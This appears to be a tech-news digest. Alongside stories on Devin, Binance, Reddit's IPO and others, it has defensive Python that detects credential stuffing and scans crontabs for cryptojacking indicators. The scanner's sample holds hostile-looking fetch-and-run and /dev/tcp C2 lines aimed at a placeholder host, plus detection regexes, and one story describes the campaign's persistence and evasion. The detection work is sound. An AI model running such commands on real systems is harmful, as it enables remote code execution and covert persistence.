Cognition Emerges From Stealth To Launch AI Software Engineer ‘Devin’
In a blog post today on Cognition’s website, Scott Wu, the founder and CEO of Cognition and an award-winning sports coder, explained Devin can access common developer tools, including its own shell, code editor and browser, within a sandboxed compute environment to plan and execute complex engineering tasks requiring thousands of decisions. The human user simply types a natural language prompt into Devin’s chatbot style interface, and the AI software engineer takes it from there, developing a detailed, step-by-step plan to tackle the problem. It then begins the project using its developer tools, just like how a human would use them, writing its own code, fixing issues, testing and reporting on its progress in real-time, allowing the user to keep an eye on everything as it works. […]
According to demos shared by Wu, Devin is capable of handling a range of tasks in its current form. This includes common engineering projects like deploying and improving apps/websites end-to-end and finding and fixing bugs in codebases to more complex things like setting up fine-tuning for a large language model using the link to a research repository on GitHub or learning how to use unfamiliar technologies. In one case, it learned from a blog post how to run the code to produce images with concealed messages. Meanwhile, in another, it handled an Upwork project to run a computer vision model by writing and debugging the code for it. In the SWE-bench test, which challenges AI assistants with GitHub issues from real-world open-source projects, the AI software engineer was able to correctly resolve 13.86% of the cases end-to-end — without any assistance from humans. In comparison, Claude 2 could resolve just 4.80% while SWE-Llama-13b and GPT-4 could handle 3.97% and 1.74% of the issues, respectively. All these models even required assistance, where they were told which file had to be fixed. Currently, Devin is available only to a select few customers. Bloomberg journalist Ashlee Vance wrote a piece about his experience using it here.
“The Doom of Man is at hand,” captions Slashdot reader ahbond. “It will start with the low-hanging Jira tickets, and in a year or two, able to handle 99% of them. In the short term, software engineers may become like bot farmers, herding 10-1000 bots writing code, etc. Welcome to the future.”
Read more of this story at Slashdot.
Modern Workplace Tech Linked To Lower Employee Well-Being, Study Finds
Pentagon Scraps $2.5 Billion Grant To Intel
Binance Executives Were Arrested In Nigeria For Allegedly Destabilizing Its Currency
The Nigerian government has accused Binance of exacerbating the country’s foreign exchange challenges through rate manipulation for profit. The authorities have also accused the crypto exchange of illegal operations and have restricted access to the company’s website. There are also reports that Nigeria sought a $10 billion penalty from Binance for processing around $26 billion in untraceable funds in the country. […] The reason why and how Nigeria’s economic crisis is linked with Binance is yet to be found out. Binance is hoping to resolve the matter soon, according to CoinDesk. The report notes that Nigeria is experiencing its worst economic crisis in recent years due to inflation and the devaluation of their currency, the naira.
Google Paid $10 Million In Bug Bounty Rewards Last Year
The highest reward for a vulnerability report in 2023 was $113,337, while the total tally since the program’s launch in 2010 has reached $59 million. For Android, the world’s most popular and widely used mobile operating system, the program awarded over $3.4 million. Google also increased the maximum reward amount for critical vulnerabilities concerning Android to $15,000, driving increased community reports. During security conferences like ESCAL8 and hardwea.io, Google awarded $70,000 for 20 critical discoveries in Wear OS and Android Automotive OS and another $116,000 for 50 reports concerning issues in Nest, Fitbit, and Wearables. Google’s other big software project, the Chrome browser, was the subject of 359 security bug reports that paid out a total of $2.1 million.
Former Activision CEO Bobby Kotick Considering Buying TikTok
Over 15,000 Roku Accounts Sold To Buy Streaming Subscriptions, Devices
“It appears likely that the same username/password combinations had been used as login information for such third-party services as well as certain individual Roku accounts,” reads the data breach notice. “As a result, unauthorized actors were able to obtain login information from third-party sources and then use it to access certain individual Roku accounts. “After gaining access, they then changed the Roku login information for the affected individual Roku accounts, and, in a limited number of cases, attempted to purchase streaming subscriptions.” Roku says that it secured the impacted accounts and forced a password reset upon detecting the incident. Additionally, the platform’s security team investigated for any charges due to unauthorized purchases performed by the hackers and took steps to cancel the relevant subscriptions and refund the account holders.
A researcher told BleepingComputer last week that the threat actors have been using a Roku config to perform credential stuffing attacks for months, bypassing brute force attack protections and captchas by using specific URLs and rotating through lists of proxy servers. Successfully hacked accounts are then sold on stolen account marketplaces for as little as 50 cents, as seen below where 439 accounts are being sold. The seller of these accounts provides information on how to change information on the account to make fraudulent purchases. Those who purchase the stolen accounts hijack them with their own information and use stored credit cards to purchase cameras, remotes, soundbars, light strips, and streaming boxes. After making their purchases, it is common for them to share screenshots of redacted order confirmation emails on Telegram channels associated with the stolen account marketplaces.
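The paragraph above makes a point defenders often miss: a stuffing campaign that rotates through proxy lists never trips a per-IP rate limit, because each source address makes only one or two attempts. The script below is an added illustration (not code from Roku, BleepingComputer or the researcher quoted); it runs two detectors over a constructed auth log in an assumed "timestamp ip username OK|FAIL" format. The classic per-IP check catches a single-source brute force but misses the rotating-proxy burst, while a population-level check (many failures in one window, nearly every one from a different source IP) catches the burst and ignores the single-source case. The IP ranges and usernames are documentation placeholders, and the thresholds are illustrative.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format (not Roku's): "<iso-timestamp> <source-ip> <username> <OK|FAIL>"


def parse_events(lines):
    """Parse log lines into (timestamp, ip, user, result) tuples, oldest first."""
    events = []
    for line in lines:
        ts, ip, user, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, user, result))
    return sorted(events)


def single_source_detector(events, max_users_per_ip=5):
    """Classic brute-force check: one source IP failing against many usernames.
    Returns the offending IPs."""
    users_by_ip = defaultdict(set)
    for _, ip, user, result in events:
        if result == "FAIL":
            users_by_ip[ip].add(user)
    return sorted(ip for ip, users in users_by_ip.items() if len(users) > max_users_per_ip)


def distributed_stuffing_detector(events, window=timedelta(minutes=10),
                                  min_failures=50, min_fresh_ip_ratio=0.8):
    """Population-level check that survives proxy rotation: a sliding window
    with many failures where nearly every failure comes from a distinct IP.
    Returns (window_start, window_end, failures, distinct_ips) for the first
    such window, or None if no window qualifies."""
    start = 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > window:
            start += 1
        fails = [(ip, user) for _, ip, user, r in events[start:end + 1] if r == "FAIL"]
        if len(fails) < min_failures:
            continue
        distinct_ips = len({ip for ip, _ in fails})
        if distinct_ips / len(fails) >= min_fresh_ip_ratio:
            return (events[start][0], events[end][0], len(fails), distinct_ips)
    return None


def build_rotating_proxy_log():
    """Constructed sample: an hour of normal logins from 20 home IPs, plus a
    five-minute stuffing burst where every attempt uses a fresh proxy IP and a
    fresh username; three of the stuffed credentials happen to work."""
    base = datetime(2024, 3, 11, 12, 0, 0)
    lines = [f"{(base + timedelta(minutes=i)).isoformat()} 198.51.100.{i % 20 + 1} user{i % 20:02d} OK"
             for i in range(60)]
    burst = base + timedelta(minutes=30)
    for i in range(200):
        result = "OK" if i in (17, 88, 151) else "FAIL"
        lines.append(f"{(burst + timedelta(seconds=1.5 * i)).isoformat()} "
                     f"203.0.113.{i + 1} victim{i:03d} {result}")
    return lines


def build_single_source_log():
    """Constructed sample: one IP hammering 60 usernames in two minutes."""
    base = datetime(2024, 3, 11, 13, 0, 0)
    return [f"{(base + timedelta(seconds=2 * i)).isoformat()} 192.0.2.7 user{i:02d} FAIL"
            for i in range(60)]


if __name__ == "__main__":
    rotating = parse_events(build_rotating_proxy_log())
    print("rotating proxies, per-IP detector:", single_source_detector(rotating))
    print("rotating proxies, windowed detector:", distributed_stuffing_detector(rotating))
    single = parse_events(build_single_source_log())
    print("single source, per-IP detector:", single_source_detector(single))
    print("single source, windowed detector:", distributed_stuffing_detector(single))
```

The windowed detector deliberately ignores who the usernames are; the signal is that failures arrive from a population of addresses that each appear once. In practice it is paired with per-account protections (forcing a reset on the accounts that did succeed inside the flagged window, as Roku did), since the three "OK" rows in the burst are exactly the accounts the seller would list.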
Surgeons Perform UK’s First Operation Using Apple’s Vision Pro Headset
“It eliminates human error and eliminates the guesswork,” said Suvi Verho, lead scrub nurse at London Independent Hospital. “It gives you confidence in surgery.” While this marked the first time that the Vision Pro was used during a UK surgery, the first-ever time the device was used in an operating room was last month, just three days after its release, when Orlando resident and world-renowned Neurosurgeon Dr. Robert Masson wore it during several spine reconstruction surgeries. “We are in a new era of surgery, and for the first time, our surgical teams have the brilliance of visual holographic guidance and maps, improving visuospatial and temporal orientation for each surgical team and for each surgery in all specialties,” said Masson.
Misconfigured Cloud Servers Targeted with Linux Malware for New Cryptojacking Campaign
Typically, this is exploited to write out a job for the Cron scheduler to execute… In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.
The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker’s Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilise the vurl executable to retrieve the first stage payload from the C2 server… To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh
“Multiple user mode rootkits are deployed to hide malicious processes,” they note. And one of the shell scripts “makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker’s session from being appended to the history file… Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn’t appear in the shell history once a new session has been spawned.”
The same script also inserts “an attacker-controlled SSH key to maintain access to the compromised host,” according to the article, retrieves a miner for the Monero cryptocurrency and then “registers persistence in the form of systemd services” for both the miner and an open source Golang reverse shell utility named Platypus.
It also delivers “various utilities,” according to the blog SecurityWeek, “including ‘masscan’ for host discovery.” Citing Cado’s researchers, they write that the shell script also “weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents.”
The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet… [“For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host,” the researchers write.]
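Several of the persistence and evasion behaviours described above (base64-encoded commands decoded and piped to bash from cron, a /dev/tcp connection helper, shopt-based history suppression, a Python urllib2 fallback downloader, the /usr/bin/vurl path, masscan) leave strings a defender can hunt for in crontabs and dropped scripts. The scanner below is an added example and not Cado's or SecurityWeek's code; its regexes are my own approximations of those indicators, the crontab it scans is constructed for the demonstration, and c2.example.invalid is a placeholder host. Its one non-obvious step is that it decodes base64 blobs found in a cron line and scans the decoded text too, so an encoded command is inspected rather than hidden.

```python
import base64
import re

# Indicator patterns modelled on the behaviours the write-up describes.
# These regexes are my own approximations, not Cado's detection rules.
INDICATORS = [
    ("base64-decode-piped-to-shell",
     re.compile(r"base64\s+(?:-d|--decode)\b[^|\n]*\|\s*(?:ba)?sh\b")),
    ("bash-dev-tcp-connect", re.compile(r"/dev/tcp/")),
    ("shopt-history-suppression", re.compile(r"\bshopt\b[^\n]*\bhist")),
    ("python-urllib2-download", re.compile(r"\burllib2\b")),
    ("vurl-dropper-path", re.compile(r"/usr/bin/vurl\b")),
    ("masscan-host-discovery", re.compile(r"\bmasscan\b")),
]

# Anything that looks like a base64 blob long enough to carry a command.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_blobs(text):
    """Return the printable ASCII decodings of base64-looking blobs in text.
    Runs that merely look like base64 (paths such as /usr/bin/logrotate) fail
    padding validation or decode to binary and are skipped."""
    decoded = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
            s = raw.decode("ascii")
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in s):
            decoded.append(s)
    return decoded


def scan_line(line, depth=0):
    """Match indicators against a line, then recurse into any base64 payload it
    carries, reporting (indicator, depth) so encoded hits are distinguishable."""
    hits = [(name, depth) for name, rx in INDICATORS if rx.search(line)]
    if depth < 2:
        for payload in decode_blobs(line):
            hits.extend(scan_line(payload, depth + 1))
    return hits


def scan_crontab(text):
    """Map 1-based line numbers of a crontab to their indicator hits,
    skipping blank and comment lines."""
    findings = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        hits = scan_line(line)
        if hits:
            findings[lineno] = hits
    return findings


# Constructed crontab for the demonstration; c2.example.invalid is a placeholder
# and the encoded payload only toggles a shell option and opens a descriptor.
SAMPLE_TEMPLATE = """\
# constructed example crontab, not material from the campaign
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * echo {blob} | base64 -d | bash
*/10 * * * * /usr/bin/vurl c2.example.invalid 80 | sh
*/15 * * * * python -c "import urllib2; urllib2.urlopen('http://c2.example.invalid/t.sh')"
30 2 * * * /usr/local/bin/backup.sh
"""


def build_sample():
    """Assemble the sample crontab, encoding the payload at run time."""
    payload = b"shopt -u -o history; exec 3<>/dev/tcp/c2.example.invalid/443"
    return SAMPLE_TEMPLATE.format(blob=base64.b64encode(payload).decode())


if __name__ == "__main__":
    for lineno, hits in sorted(scan_crontab(build_sample()).items()):
        print(lineno, hits)
```

Run against the sample, line 3 reports the base64-to-bash pattern at depth 0 and, from the decoded payload, the /dev/tcp and shopt indicators at depth 1; lines 4 and 5 report the vurl path and the urllib2 fallback; the two legitimate jobs report nothing. The same `scan_line` can be pointed at systemd unit files and shell scripts recovered from a host, which is where the SSH-key and miner persistence described above would show up.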
“This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers,” Cado notes. “It’s clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments.”
Does Reddit Represent the Return of the Junk Stock IPO?
Some of the numbers lead back to a single individual: Sam Altman. The co-founder and chief executive of ChatGPT-maker OpenAI owns an 8.7 percent stake in Reddit, more than its co-founder and CEO, Steve Huffman, who owns 3.3 percent… Altman, through various funds and holding companies he owns or manages, controls more than a million shares of Reddit at $60 million in aggregate purchase price — and holds more than 9 percent of voting rights…
Discussing Reddit’s future, financial analyst and journalist Herb Greenberg recently told CNBC, “This is an AI play.”
But the senior investing editor for Kiplinger.com argues that retail investors “may want to hold tight before rushing out to buy the Reddit IPO.”
While IPO stocks tend to have strong first-day showings, returns for the first year are generally weak, says the team of analysts at Trivariate Research, a market research firm based in New York. And since 2020, “the average IPO has lagged its industry average by 30% over the subsequent three years following its first closing price…”
Other commenters have noted that Reddit’s allotment of shares to select Redditors could lower demand on the first day of trading, which would work against any IPO pop.
“Over the past few years, there have been a bunch of IPOs in the U.S. in which overhyped names enjoyed flashy stock-market debuts only to drop sharply soon after,” notes the Street.
Notable examples include Coinbase, which plummeted by almost 90% after its debut, Robinhood, still down 53% since its IPO, and Rivian, down over 91% since its debut. However, it’s crucial to note that all of these IPOs occurred in 2021 amid market euphoria fueled by low interest rates, significant economic stimulus, and the lingering effects of the Covid-19 pandemic. Although the current macroeconomic landscape differs from three years ago, valuations of tech and growth stocks remain stretched.
Kiplinger.com concludes it “boils down to your own personal investing goals and risk tolerance. If you do decide to buy Reddit stock when it first begins trading, do so in a small amount that you can afford to lose.”
But they also cite analysis from David Trainer, CEO of New Constructs, a research firm powered by artificial intelligence. “Reddit’s IPO marks the return of the junk IPO,” Trainer wrote in Forbes. “[The valuation] implies that Reddit will grow its user base to 26 times current levels, which would be nearly five times the size of [Snapchat-maker] Snap, and a highly unlikely feat. Reddit looks overvalued, and we think investors should pass on this IPO.”
Trainer writes:
[T]he company has never been profitable and should not be a publicly traded company… I think the company may never monetize its platform without angering its users and the entire premise of Reddit is user-generated content. This business model is inescapably built on a catch-22: make money or please users… Reddit looks overvalued, and I think investors should pass on this IPO.
Buyers and analysts told the site Marketing Brew “that they see the platform as nice-to-have, but that it is not an essential part of their media plans, like Meta or Google are.”
“They’ve always been solidly in the second or third tier of social networks,” alongside Snap, Pinterest, and X, Brian Wieser, a former GroupM exec who’s now author of the industry newsletter Madison and Wall, told Marketing Brew.
Yet Trainer notes that “98% of Reddit’s revenue in 2023 came from third-party advertising on the site and 28% of all revenue came from ten customers,” and “Reddit’s cost of revenue, sales & marketing, general & administrative, and research & development costs were 117% of revenue in 2023.”
Trainer concludes “Reddit is nowhere near breakeven. Reddit is an unprofitable social media company fighting for users.”
Bloomberg adds that the subreddit r/WallStreetBets “has threatened to bet against the stock, with many people noting that the company still loses money two decades into its existence. (Reddit lost $90.8 million last year, down from $158.6 million the year before.)”
Some have complained that the invitation to invest fails to make up for the unpaid labor they’ve invested making the site work… In 2021 the platform’s WallStreetBets forum ignited a meme-stock frenzy, propelling skyward the stocks of nostalgic but struggling companies like GameStop Corp. and AMC Entertainment Holdings Inc. and sending shockwaves through the financial industry… When it goes public, the platform that invented meme stocks runs the risk of becoming one itself.
Reddit noted the possibility as a risk in its IPO filing. “Given the broad awareness and brand recognition of Reddit, including as a result of the popularity of r/wallstreetbets among retail investors,” the company warned that its stock could “experience extreme volatility … which could cause you to lose all or part of your investment if you are unable to sell your shares at or above the initial offering price.”
Users on WallStreetBets got a kick out of the fact that the company listed the forum as a risk factor, posting about it with a sly smiling emoji…
Meanwhile, reports that marketers are infiltrating subreddits have been confirmed. Over 200 businesses have “integrated Reddit Pro into their digital strategies,” reports Search Engine Land, including “well-known names such as Taco Bell, the NFL, and The Wall Street Journal…
“During the initial alpha testing phase with approximately 20 businesses, Reddit reported its Pro partners, on average, generated 11 additional posts and comments per month.”